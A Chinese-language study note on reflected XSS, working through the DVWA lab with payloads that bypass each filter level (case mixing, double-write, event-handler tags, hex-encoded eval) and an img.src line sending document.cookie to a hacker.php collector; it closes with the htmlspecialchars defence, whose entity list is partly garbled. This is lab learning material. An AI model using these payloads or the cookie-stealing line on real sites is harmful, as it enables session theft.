XSS-反射型

前情提要：html的dom对象：document

如document.cookie  / document.write()

http://netsecurity.51cto.com/art/201311/417201.htm实战演示

1.判断是否有反射型XSS漏洞：

2.实践

http://www.storysec.com/dvwa-xss-reflected.html

https://www.cnblogs.com/wang1212-/p/9028349.html两个都给我看

img.src="http://localhost/xss/hacker.php?x=" + document.cookie;  //document.location：将页面的内容指定到指定位置

其实不写hacker.js文件也行，直接url里构造就好了

+document.cookie的+是连接符而已，其实是替代了空格、回车！！！（+号可以用%2b编码）

//PHPSESSID后的value可以直接双击修改

 @靶场实践DVWA-XSS（reflected）

教程http://www.storysec.com/dvwa-xss-reflected.html

https://www.cnblogs.com/wang1212-/p/9028349.html（更牛逼）

http://www.storysec.com/dvwa-xss-reflected.html（更更牛逼）

1.为啥在搜索框里输入<script>alert(/xss/)</script>不跳出弹窗？

（1）F12一下，html的<pre>标签把<>实体化了，所以输入</pre><script>alert(/xss/)</script><pre>，抵消掉原来的pre标签，弹窗就出来了

（2）<script>被过滤了：$name = str_replace( '<script>', '', $_GET[ 'name' ] );

法一：大小写绕过 </pre><SCriPt>alert(/xss/)</ScRipt><pre>

法二：双写绕过  ‘><sc<script>ript>alert("如果你能看到，说明攻击成功")</script>话说为什么要加'>啊？看另一个教程就没加'>，没有也可以跳出弹窗的说

str_replace()只过滤了一次<script>,外面的被拼接，真是妙不可言

（3）<script>被更厉害地被过滤了（正则）

preg_replace 函数使用正则表达式的搜索和替换，使得双写绕过、大小写混淆也无能为力了。

我们可以考虑通过img、body等标签的事件或者iframe等标签的src注入恶意的js代码

比如：</pre><img src=1 onerror=alert(/xss/)><pre>

　　　<a href='#' onclick=alert(/xss/)>test</a>

　　　<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>　　

　　　<iframe onload=alert(1)>

　　　<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>

（4）使用htmlspecialchars函数把预定义的字符&、”、 ’、<、>转换为 HTML 实体，防止浏览器将其作为HTML元素

于是这下完全防御了XSS注入

& （和号）成为 &
" （双引号）成为 "
' （单引号）成为 '//生效需要加 ENT_QUOTES 参数
< （小于）成为 &lt;
> （大于）成为 &gt;

2.输入<Xtt>XSS,F12发现出现<xtt>XSS</xtt>标签，说明存在XSS漏洞

原理：事实上并没有<Xtt>这个标签，只是html的自动补全功能,还他喵的不分大小写